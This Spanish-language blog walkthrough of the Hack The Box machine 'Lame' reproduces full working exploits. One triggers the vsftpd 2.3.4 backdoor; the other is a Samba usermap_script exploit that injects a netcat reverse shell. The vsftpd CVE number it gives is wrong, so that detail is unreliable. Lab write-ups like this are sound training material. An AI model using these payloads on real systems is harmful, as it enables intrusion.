LAME

Plataforma: Hack The Box
OS: Linux
Machine:Lame
Dirección IP: 10.10.10.3

Reconocimiento

Comandos:
nmap -sC -sV 10.10.10.

Buscamos algún exploit para las siguientes versiones de servicios:

Comandos:
searchsploit vsftpd 2.3.4
searchsploit OpenSSH 4.7p1
searchsploit Samba 3.0.20

Explotación

Encontramos los siguientes Scrits para explotar las versiones de los siguientes servicios:

Versión del servicio: vsftpd 2.3.4
CVE: CVE-2011-0762

Link: https://github.com/In2econd/vsftpd-2.3.4-exploit

Script:

#!/usr/bin/python3
import socket
import sys
import time


def exploit(ip, port, command):
    """ Triggers vsftpd 2.3.4 backdoor and prints supplied command's output """

    try:
        print('[*] Attempting to trigger backdoor...')
        ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ftp_socket.connect((ip, port))

        # Attempt to login to trigger backdoor
        ftp_socket.send(b'USER letmein:)\n')
        ftp_socket.send(b'PASS please\n')
        time.sleep(2)
        ftp_socket.close()
        print('[+] Triggered backdoor')

    except Exception:
        print('[!] Failed to trigger backdoor on %s' % ip)

    try:
        print('[*] Attempting to connect to backdoor...')
        backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        backdoor_socket.connect((ip, 6200))
        print('[+] Connected to backdoor on %s:6200' % ip)
        command = str.encode(command + '\n')
        backdoor_socket.send(command)
        response = backdoor_socket.recv(1024).decode('utf-8')
        print('[+] Response:\n', response, sep='')
        backdoor_socket.close()

    except Exception:
        print('[!] Failed to connect to backdoor on %s:6200' % ip)


if __name__ == '__main__':

    if len(sys.argv) < 4:
        print('Usage: ./vsftpd_234_exploit.py <IP address> <port> <command>')
        print('Example: ./vsftpd_234_exploit.py 192.168.1.10 21 whoami')

    else:
        exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3])

Como vemos no funciono el Script:

Intentamos con el siguiente:

Versión del Servicio: Samba 3.0.20
CVE: CVE-2007-2447

Link: https://github.com/amriunix/CVE-2007-2447

Script:

#!/usr/bin/python
# -*- coding: utf-8 -*-

# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

import sys
from smb.SMBConnection import SMBConnection

def exploit(rhost, rport, lhost, lport):
        payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
        username = "/=`nohup " + payload + "`"
        conn = SMBConnection(username, "", "", "")
        try:
            conn.connect(rhost, int(rport), timeout=1)
        except:
            print '[+] Payload was sent - check netcat !'

if __name__ == '__main__':
    print('[*] CVE-2007-2447 - Samba usermap script')
    if len(sys.argv) != 5:
        print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)

Ejecutamos el Script y dejamos el puerto 444 en escucha con netcat, para recibir la Shell Inversa:

Finalmente obtenemos las banderas de root y de user:

Comandos:

whoami

uname -a

Etiquetas: Hacking, HackTheBox, Walkthrough

0xsecure

jueves, 11 de junio de 2020

Machine:Lame

LAME

Reconocimiento

Explotación

0 comentarios:

Publicar un comentario

Datos personales

Entradas anteriores